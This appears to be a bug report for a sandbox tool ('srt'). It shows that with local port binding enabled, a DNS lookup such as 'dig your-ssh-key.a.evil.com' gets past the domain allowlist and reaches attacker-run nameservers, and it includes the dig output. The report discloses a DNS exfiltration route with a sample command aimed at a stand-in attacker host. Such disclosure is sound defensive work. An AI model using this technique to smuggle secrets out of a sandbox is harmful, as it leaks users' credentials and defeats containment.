settings.json
{
"network": {
"allowedDomains": [],
"deniedDomains": [],
"allowLocalBinding": true
},
"filesystem": {
"denyRead": [],
"allowWrite": [],
"denyWrite": []
}
}
command
srt --settings settings.json 'dig your-ssh-key.a.evil.com'
EXPECTED
- evil.com domain is not on the allowed domains list, so this DNS query is blocked
- Allowing local port binding doesn't allow outbound network requests from inside the sandbox
ACTUAL
- Data exfiltration: evil.com owners can set an NS record for a.evil.com, which causes Google/Cloudflare/all others to send the
A your-ssh-key.a.evil.com query to evil.com-owned DNS servers.
- Any sandbox with local port binding enabled is liable for data exfiltration.
; <<>> DiG 9.10.6 <<>> your-ssh-key.a.evil.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;your-ssh-key.a.evil.com. IN A
;; ANSWER SECTION:
your-ssh-key.a.evil.com. 3600 IN A 66.96.146.129
;; Query time: 48 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Mon Jan 12 17:29:41 EST 2026
;; MSG SIZE rcvd: 68